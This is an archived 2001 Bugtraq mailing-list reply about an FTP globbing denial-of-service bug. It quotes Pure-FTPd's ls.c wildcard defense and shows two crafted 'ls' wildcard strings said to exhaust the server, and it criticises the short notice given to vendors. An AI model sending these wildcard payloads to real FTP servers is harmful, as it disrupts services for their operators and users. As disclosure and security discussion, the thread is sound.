[19672] in bugtraq
Re: Multiple vendors FTP denial of service
daemon@ATHENA.MIT.EDU (Daniel Roesen)
Fri Mar 16 11:59:11 2001
Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID: <20010315233808.A25681@hydra.entire-systems.com>
Date: Thu, 15 Mar 2001 23:38:08 +0100
Reply-To: droesen@entire-systems.com
From: Daniel Roesen <dr@BOFH.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20010315093409.A5565@synchron.home.rtchat.com>; from j@4U.NET on
Thu, Mar 15, 2001 at 09:34:09AM +0100
[NOTE to the fellow readership: "Frank DENIS (Jedi/Sector One)" is
the author of Pure-FTPD]
On Thu, Mar 15, 2001 at 09:34:09AM +0100, Frank DENIS (Jedi/Sector One) wrote:
> - Proftpd built-in 'ls' command has a globbing bug that allows remote
> denial-of-service.
>
> Here's a simple exploit, tested on the Proftpd site :
That's really great. Very convenient for you to run DoS attacks against
the main distribution site of ProFTPD.
> - PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
> expression to *" and the 'ls *' output.
It is not vulnerable to the simple attack, but to more "sophisticated"
attacks it is. 20 seconds spent looking into the source reveals:
from pure-ftpd-0.96/src/ls.c:
/* try to defend against wildcard denial-of-service attack */
doshack = strstr(arg, "/../");
if (doshack) {
/* first eliminate those at the start */
if (doshack == arg) {
while (strncmp(arg, "/../", 4) == 0) {
size_t cpa = strlen(arg + 4) + 1U;
memmove(arg, arg + 4, cpa);
}
doshack = strstr(arg, "/../");
}
/* next, eliminate /../ in the middle of the string */
while (doshack) {
char *nextcomponent = doshack + 4;
size_t cpa;
if (doshack != arg && *doshack == '/')
doshack--;
while (doshack != arg && *doshack != '/')
doshack--;
if (*doshack == '/')
doshack++;
cpa = strlen(nextcomponent) + 1U;
memmove(doshack, nextcomponent, cpa);
doshack = strstr(arg, "/../");
}
addreply(0, "Simplified wildcard expression to %s", arg);
}
So your defense is just removing "/../" sequences. That's not enough.
ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/
ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
These lead exactly to the same problems ProFTPD has. You've only gone
half-way. Thanks to John Morrissey <jwm@horde.net> for verifying this
on a test installation of Pure-FTPD.
BTW: Flood (Jesse Sipprell <jss@inflicted.net>) found that you are using
unprotected calls to glob() all over the place and concludes that it
would be trivial to launch this attack against other FTP commands (DELE
etc.) against Pure-FTPD as well.
I guess you should re-think your Skill inventory on Sourceforge:
http://sourceforge.net/people/viewprofile.php?user_id=37669
Same with the statement "Unlike other popular FTP servers, it has no
known security flaw" on the Pure-FTPD homepage.
King for a day, fool for a lifetime, eh?
> Maintainers of vulnerable servers have been warned of this bug.
Yes. 15 *minutes* before you sent this posting off to Bugtraq. I'm not
going into the usual discussion about how to handle security problems.
May the fellow readership judge for themselves how responsible your
behaviour was.
You may want to take a look at http://www.wiretrip.net/rfp/policy.html
For ProFTPD users: an official response with a workaround to the problem
is being released right now here to Bugtraq.
Daniel
ProFTPD RPM packaging maintainer
(droesen@entire-systems.com for ProFTPD related email)
